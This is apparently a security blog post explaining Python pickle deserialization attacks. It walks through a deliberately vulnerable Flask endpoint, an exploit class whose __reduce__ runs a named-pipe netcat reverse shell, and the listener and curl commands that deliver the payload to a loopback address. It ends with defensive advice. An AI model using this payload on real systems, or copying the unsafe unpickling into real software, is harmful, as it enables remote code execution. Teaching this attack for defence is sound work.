Exploiting Python pickles
In a recent challenge I needed to get access to a system by exploiting the way Python deserializes data using the pickle module. In this article I want to give a quick introduction to pickling and unpickling data, highlight the issues that can arise when your program deals with data from untrusted sources, and “dump” my own notes.
For running the example code I’m using Python 3.8.2 on macOS 10.15; the demonstration of the reverse shell is just a connect-back to a loopback address.
TL;DR: Never unpickle data from sources you don’t trust. Otherwise you open your app up to a relatively simple way of remote code execution.
What is pickle?
In Python, the pickle module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.
When consulting the Python docs for pickle one cannot miss the following warning:
Warning: The pickle module is not secure. Only unpickle data you trust.
Let’s find out why that is and how unpickling untrusted data could ruin your day.
How to dump and load?
In Python you can serialize objects by using pickle.dumps():
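As a minimal sketch: the variable name pickled is the one used in the disassembly example further down, and pinning protocol=4 is my assumption to keep the output stable across Python versions (it is the default on Python 3.8).

```python
import pickle

# Serialize a plain list into a bytes object.
# protocol=4 is pinned here (an assumption) so the bytes do not
# depend on the default protocol of the interpreter in use.
pickled = pickle.dumps(['pickle', 'me', 1, 2, 3], protocol=4)
print(pickled)
```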
The pickled representation we’re getting back from dumps will look like this:
b'\x80\x04\x95\x19\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x06pickle\x94\x8c\x02me\x94K\x01K\x02K\x03e.'
And now reading the serialized data back in…
…will give us our list object back:
['pickle', 'me', 1, 2, 3]
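The loading step can be sketched with pickle.loads(), here fed with the exact bytes shown above rather than a fresh dumps call. The variable names are just for illustration.

```python
import pickle

# The serialized list from above, pasted in as a bytes literal
pickled = (b'\x80\x04\x95\x19\x00\x00\x00\x00\x00\x00\x00]\x94('
           b'\x8c\x06pickle\x94\x8c\x02me\x94K\x01K\x02K\x03e.')

# loads() executes the opcodes in the stream and returns the rebuilt object
restored = pickle.loads(pickled)
print(restored)
```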
What is actually happening behind the scenes is that the byte stream created by dumps contains opcodes that are executed one by one as soon as we load the pickle back in. If you are curious what the instructions in this pickle look like, you can use pickletools to create a disassembly:
>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3])
>>> import pickletools
>>> pickletools.dis(pickled)
0: \x80 PROTO 4
2: \x95 FRAME 25
11: ] EMPTY_LIST
12: \x94 MEMOIZE (as 0)
13: ( MARK
14: \x8c SHORT_BINUNICODE 'pickle'
22: \x94 MEMOIZE (as 1)
23: \x8c SHORT_BINUNICODE 'me'
27: \x94 MEMOIZE (as 2)
28: K BININT1 1
30: K BININT1 2
32: K BININT1 3
34: e APPENDS (MARK at 13)
35: . STOP
highest protocol among opcodes = 4
Controlling the behavior of pickling/unpickling
Not every object can be serialized (e.g. file handles) and pickling and unpickling certain objects (like functions or classes) comes with restrictions. The Python docs give you a good overview what can and cannot be pickled.
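To illustrate the first point, here is a small sketch that tries to pickle an open file handle. Using os.devnull is just a convenient assumption to get a file object without creating a file.

```python
import os
import pickle

error = None

# An open file handle wraps OS-level state and cannot be pickled
with open(os.devnull) as handle:
    try:
        pickle.dumps(handle)
    except TypeError as exc:
        error = exc
        print(f"not picklable: {exc}")
```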
While in most cases you don’t need to do anything special to make an object “picklable”, pickle still allows you to define a custom behavior for the pickling process for your class instances.
Reading a bit further down in the docs, we can see that, from an attacker’s perspective, implementing __reduce__ is exactly what we need to get code execution:
The __reduce__() method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:
- A callable object that will be called to create the initial version of the object.
- A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. […]
So by implementing __reduce__ in a class whose instances we are going to pickle, we can hand the unpickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this to get our own reverse shell code executed.
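Before turning to anything malicious, a harmless sketch shows the mechanism. The class name Demo and the choice of sorted as the callable are hypothetical, picked only to make the effect visible: what comes out of loads is whatever the callable returns, not a Demo instance.

```python
import pickle


class Demo:
    """Hypothetical class, used only to illustrate __reduce__."""

    def __reduce__(self):
        # (callable, args): the unpickler will call sorted([3, 1, 2])
        return (sorted, ([3, 1, 2],))


data = pickle.dumps(Demo())

# Unpickling calls the callable with the given arguments
result = pickle.loads(data)
print(result)  # [1, 2, 3]
```

Swap sorted for something like os.system and the same mechanism runs a shell command during unpickling.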
Creating a vulnerable app
Now that we have a basic idea of how to create dangerous data to unpickle, let’s build a vulnerable app for demonstration purposes.
We’ll use the web framework Flask to create a small web application with one route.
Let’s install Flask in a new virtual environment:
# setup virtualenv
virtualenv venv --python=/your/path/to/python
# activate
source venv/bin/activate
# install Flask
pip install Flask
And now create app.py:
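A minimal sketch of such an app could look like the following. The route and the form field name come from the description in this article; the URL-safe base64 variant and the empty 204 response are my assumptions.

```python
import base64
import pickle

from flask import Flask, request

app = Flask(__name__)


@app.route("/hackme", methods=["POST"])
def hackme():
    # Read the base64-encoded pickle from the form field "pickled"
    # (URL-safe base64 is an assumption of this sketch)
    data = base64.urlsafe_b64decode(request.form["pickled"])
    # DANGEROUS: unpickling attacker-controlled bytes lets the sender
    # choose which callables get executed
    pickle.loads(data)
    # Nothing useful to return; reply with an empty 204
    return "", 204
```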
At /hackme we implement a POST route that takes a form field named pickled. The data arrives base64-encoded (for transfer), is decoded, and then unpickled.
Let’s run the app with flask run and then prepare our malicious pickled data to send.
Creating the exploit
As described above we want to create a class that implements __reduce__ and then serialize an instance of that class.
We’ll call our class RCE and let its __reduce__ method return a tuple of a callable and a tuple of arguments (as per the mentioned docs).
Our callable will be os.system and the argument a common reverse shell snippet using a named pipe that will run on our macOS demo machine.
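A sketch of what exploit.py could look like is shown below. The class name RCE and the os.system callable are as described above; the exact command string is an assumption (one common form of the named-pipe reverse shell, pointed at a loopback listener on port 1234), as is the URL-safe base64 encoding.

```python
import base64
import os
import pickle


class RCE:
    def __reduce__(self):
        # Assumed command: named-pipe reverse shell that connects
        # back to a listener on 127.0.0.1:1234
        cmd = ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | "
               "/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f")
        # (callable, args): unpickling will call os.system(cmd)
        return (os.system, (cmd,))


# Pickling only records a reference to os.system plus the argument;
# the command is NOT executed here, only when the data is unpickled
pickled = pickle.dumps(RCE())
print(base64.urlsafe_b64encode(pickled))
```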
Now let’s run the exploit script to create a base64 encoded pickle byte stream:
$ python exploit.py
b'gASVbgAAAAAAAACMBX...
If you run pickletools.dis again, you will see the system callable plus arguments and the REDUCE opcode (R).
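If you would rather look at the opcodes programmatically, pickletools.genops parses a pickle without executing it. The sketch below uses a harmless stand-in (a hypothetical Demo class whose callable is print) instead of the real payload, and pins protocol=4 as an assumption.

```python
import pickle
import pickletools


class Demo:
    """Hypothetical stand-in for the RCE class, with a harmless callable."""

    def __reduce__(self):
        return (print, ("hello from unpickling",))


data = pickle.dumps(Demo(), protocol=4)

# genops only parses the stream; no callable is invoked
opnames = [opcode.name for opcode, arg, pos in pickletools.genops(data)]
print(opnames)
```

The list contains STACK_GLOBAL (which pushes the callable) followed later by REDUCE (which calls it).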
Sending the payload
Finally, we can start a netcat listener and send the payload to our listening Flask application:
# netcat listener for reverse shell in separate window/pane
nc -nvl 1234
# Send request
curl -d "pickled=gASVbgAAAAAAAACMBX..." http://127.0.0.1:5000/hackme
After sending the HTTP request to /hackme, our code will execute and give us a shell back.
Lesson from this demonstration: don’t unpickle untrusted data. It doesn’t matter if you receive this pickled data from anonymous users over the network or if it’s passed to you to restore a session or program state.
If you need to work with untrusted data – depending on your use case – consider signing the data if it could have been modified on the way to you or on disk, or choose a different (safer) serialization method altogether (like JSON), as per the docs. When storing pickles on the filesystem it is also worth checking the file permissions to prevent privilege escalations through modification of those pickles.
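The signing idea can be sketched with the standard library’s hmac module. The key, the function names, and the layout (a 32-byte HMAC-SHA256 tag followed by the pickle) are all hypothetical choices for this example. Note that this only protects against tampering by someone who does not know the key.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-real-secret"  # hypothetical key
TAG_LEN = hashlib.sha256().digest_size      # 32 bytes


def sign(data: bytes) -> bytes:
    """Prefix the pickled bytes with an HMAC-SHA256 tag."""
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data


def verify_and_load(blob: bytes):
    """Unpickle only if the tag matches; raise ValueError otherwise."""
    tag, data = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    # compare_digest avoids leaking information through timing
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch, refusing to unpickle")
    return pickle.loads(data)


blob = sign(pickle.dumps({"user": "alice"}))
print(verify_and_load(blob))
```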
To learn more, I recommend watching the BlackHat 2011 talk “Sour Pickles, A serialised exploitation guide in one part” by Marco Slaviero. He describes in detail the (un)pickling process, the pickle virtual machine parts, and how to craft more general shellcodes using a custom toolset.